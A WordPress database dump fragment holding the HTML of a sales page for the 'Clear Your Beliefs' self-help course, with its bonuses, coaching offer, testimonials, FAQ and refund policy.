The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1937, 2223, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:73245:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n<p><center><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png" alt="clear your beliefs" width="1" height="1" class="aligncenter" size-medium wp-image-1475" /></a></p><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank" >Register for FREE Ebook</a><br /></center></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 